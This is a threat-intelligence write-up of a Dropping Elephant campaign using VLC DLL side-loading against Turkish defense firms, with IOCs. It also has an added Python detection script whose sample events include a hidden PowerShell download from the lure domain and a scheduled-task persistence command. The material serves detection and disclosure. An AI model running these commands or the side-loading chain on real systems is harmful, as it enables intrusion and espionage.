Arctic Wolf Labs has identified a sophisticated cyber-espionage campaign by the Dropping Elephant APT group targeting Turkish defense contractors, specifically a manufacturer of precision-guided missile systems.
The campaign showcases a significant technical evolution from the group’s previous operations, employing a five-stage execution chain that leverages the popular VLC Media Player through DLL side-loading techniques to deliver encrypted shellcode payloads.
Strategic Targeting of Turkish Defense Industry
The attack centers on a carefully crafted spear-phishing campaign using malicious LNK files disguised as conference invitations for the “Unmanned Vehicle Systems Conference 2025 in Istanbul.”
The timing appears deliberately aligned with heightened Turkey-Pakistan defense cooperation and recent India-Pakistan military tensions, suggesting geopolitically motivated targeting.
Turkey’s commanding 65% share of the global UAV export market and its development of hypersonic missile capabilities make its defense industry a high-value strategic intelligence objective for the threat actor.
The initial vector involves a malicious LNK file (SHA-256: 341f27419becc456b52d6fbe2d223e8598065ac596fa8dec23cc722726a28f62) that executes PowerShell commands to download five distinct components from the malicious domain expouav[.]org, which mimics the legitimate conference website waset.org.
The downloaded files include a visual PDF decoy, legitimate VLC Player and Microsoft Task Scheduler binaries, a malicious DLL library, and encrypted shellcode stored as vlc.log.
Technical Evolution and Advanced Evasion Methods
Dropping Elephant has significantly evolved its technical capabilities, transitioning from x64 DLL variants observed in November 2024 to current x86 PE executables with enhanced command structures.

The group has reduced library dependencies and implemented direct C2 command parsing using the C standard library’s strtok() function with dollar-sign ($) delimiters, indicating deliberate operational security improvements.
The attack establishes persistence through a scheduled task that abuses VLC Media Player to side-load the malicious libvlc.dll file (SHA-256: 2cd2a4f1fc7e4b621b29d41e42789c1365e5689b4e3e8686b80f80268e2c0d8d).
The shellcode is decrypted using the key “76bhu93FGRjZX5hj876bhu93FGRjX5” and decrypts to a 139.37 KB x86 PE executable capable of comprehensive system reconnaissance.
The malware creates a mutex named “ghjghkj” to prevent multiple instances and performs extensive victim profiling, including collecting computer names, gathering usernames, retrieving firmware information, and enabling screenshot capture functionality.
Communication occurs through the C2 server roseserve[.]org, which impersonates Turkey’s Pardus Linux distribution project website to maintain operational security.
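As an added illustration that is not part of the Arctic Wolf report, the following Python triages simplified endpoint telemetry for the stages described above: the lure-domain download, the scheduled task that launches VLC, vlc.exe side-loading libvlc.dll from outside its install directory (or with the reported hash), and DNS lookups of the lure or C2 domain. The event schema, the trusted VLC install directories and the sample events are assumptions constructed for the example; the hashes and domains come from the article.

```python
# Indicators taken from the article (LNK lure, malicious libvlc.dll, lure and C2 domains).
# Event schema, trusted VLC directories and sample events below are assumptions / constructed.
BAD_SHA256 = {
    "341f27419becc456b52d6fbe2d223e8598065ac596fa8dec23cc722726a28f62",
    "2cd2a4f1fc7e4b621b29d41e42789c1365e5689b4e3e8686b80f80268e2c0d8d",
}
BAD_DOMAINS = {"expouav.org", "roseserve.org"}
# Where a genuine VLC install loads libvlc.dll from (assumed; adjust to your estate).
TRUSTED_VLC_DIRS = (r"c:\program files\videolan\vlc", r"c:\program files (x86)\videolan\vlc")

def triage(event):
    """Return the names of the detections that fire on a single telemetry event."""
    hits = []
    image = event.get("image", "").lower()
    if event["type"] == "process":
        cmd = event.get("cmdline", "").lower()
        # Stage 1: LNK-spawned PowerShell fetching components from the lure domain.
        if image.endswith("powershell.exe") and any(d in cmd for d in BAD_DOMAINS):
            hits.append("powershell_download_from_lure_domain")
        # Persistence: a scheduled task whose action is a VLC binary.
        if "schtasks" in cmd and "/create" in cmd and "vlc.exe" in cmd:
            hits.append("scheduled_task_launches_vlc")
    elif event["type"] == "image_load":
        loaded = event.get("loaded", "").lower()
        # Side-load: vlc.exe pulling libvlc.dll from an untrusted path, or a known-bad hash.
        if image.endswith("vlc.exe") and loaded.endswith("libvlc.dll"):
            if not loaded.startswith(TRUSTED_VLC_DIRS):
                hits.append("vlc_sideload_libvlc_from_untrusted_dir")
            if event.get("sha256", "").lower() in BAD_SHA256:
                hits.append("known_bad_libvlc_hash")
    elif event["type"] == "dns":
        if event.get("query", "").lower().rstrip(".") in BAD_DOMAINS:
            hits.append("dns_query_to_lure_or_c2_domain")
    return hits

def hunt(events):  # keep only the events that raised at least one detection
    return [(e["id"], h) for e in events if (h := triage(e))]

# Constructed sample telemetry modelled on the chain described in the article.
SAMPLE_EVENTS = [
    {"id": "e1", "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr https://expouav.org/vlc.log -OutFile C:\Users\Public\vlc.log"'},
    {"id": "e2", "type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn Updater /tr "C:\Users\Public\vlc.exe" /sc minute'},
    {"id": "e3", "type": "image_load", "image": r"C:\Users\Public\vlc.exe", "loaded": r"C:\Users\Public\libvlc.dll",
     "sha256": "2cd2a4f1fc7e4b621b29d41e42789c1365e5689b4e3e8686b80f80268e2c0d8d"},
    {"id": "e4", "type": "image_load", "image": r"C:\Program Files\VideoLAN\VLC\vlc.exe",
     "loaded": r"C:\Program Files\VideoLAN\VLC\libvlc.dll", "sha256": "00" * 32},  # benign, constructed hash
    {"id": "e5", "type": "dns", "query": "roseserve.org"},
]
```

Event e4 is a legitimate VLC load and must produce no hits; the other four each match one stage of the chain.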
The infrastructure analysis reveals sophisticated preparation, with domain registrations beginning in June 2025 and active operations commencing in July 2025, demonstrating careful campaign planning rather than opportunistic targeting.
Arctic Wolf Labs has implemented new detections in its Aurora Platform to protect customers against this evolving threat.
Indicators of Compromise (IOCs)
File Indicators
| Name | SHA-256 |
|---|---|
| Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk | 341f27419becc456b52d6fbe2d223e8598065ac596fa8dec23cc722726a28f62 |
| Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf | 588021b5553838fae5498de40172d045b5168c8e608b8929a7309fd08abfaa93 |
| lake (libvlc.dll) | 2cd2a4f1fc7e4b621b29d41e42789c1365e5689b4e3e8686b80f80268e2c0d8d |
| vlc.log | 89ec9f19958a442e9e3dd5c96562c61229132f3acb539a6b919c15830f403553 |